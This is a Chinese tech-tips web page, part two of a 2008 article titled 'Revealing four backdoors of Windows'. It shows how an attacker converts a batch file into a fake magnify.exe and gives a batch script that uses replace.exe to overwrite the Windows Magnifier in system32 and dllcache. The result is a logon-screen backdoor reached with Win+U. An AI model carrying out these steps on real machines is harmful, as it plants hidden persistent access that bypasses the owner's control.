dedecms织梦内容管理系统      

--充电学院首页-- | --IT新闻与咨询-- | --网络操作技巧-- | --软件硬件教程-- | --精品资料收藏-- | --其他相关文章-- | --常用优秀软件-- | --桌面图片欣赏-- | --网络淘金技法-- | --媒体网站资源-- | --火狐专题介绍-- |

  当前位置:主页>电脑应用技术>文章内容
揭秘Windows系统的四个后门(2)
来源: 作者:方舟 发布时间:2008-09-27  
stvista

(2).文件格式转换
  因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。
  打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com,继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。(图3)

 
 

(3).放大镜文件替换

  下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%\system32\dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。

  @echo off

  copy %Windir%\system32\dllcache\magnify.exe nagnify.exe

  copy %Windir%\system32\magnify.exe nagnify.exe

  replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache

  replace.exe %Windir%\magnify.exe %Windir%\system32

  exit

  上面批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换。(图4)

 


[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·五笔打字学习另类方法
·实现定时开机的方法
·更换硬盘图标技巧
·电脑自动重启原因小结
·无法显示验证码的解决办法
·电脑操作小技巧3則
·解决Ghost版本局域网不能共享打
·解除禁用USB接口
·几个批量处理!让你的电脑急速如
·直接用XP的事件查看器破解电信星
·屏幕截图技巧
·文件后缀名与打开方式(3)
  相关文章
·揭秘Windows系统的四个后门(1)
·揭秘Windows系统的四个后门(3)
·揭秘Windows系统的四个后门(4)
·轻松处理系统的变量值
·保证Windows操作系统无毒两个技
·U盘流行病毒分析及清除方法
·一个藏你秘密的方法
·Ctrl键的两点妙用
·计算机安全模式的用途
·五招解决WinXP启动后操作迟延的
·任务管理器之旁门左道
·远离磁盘碎片,提高硬盘读取速度
  兴趣话题
·
·
·全国地图服务
网站为ZQF个人所有 Power by DedeCms 所有文章来自网络,如有冒犯,请email 或 qq告之,谢谢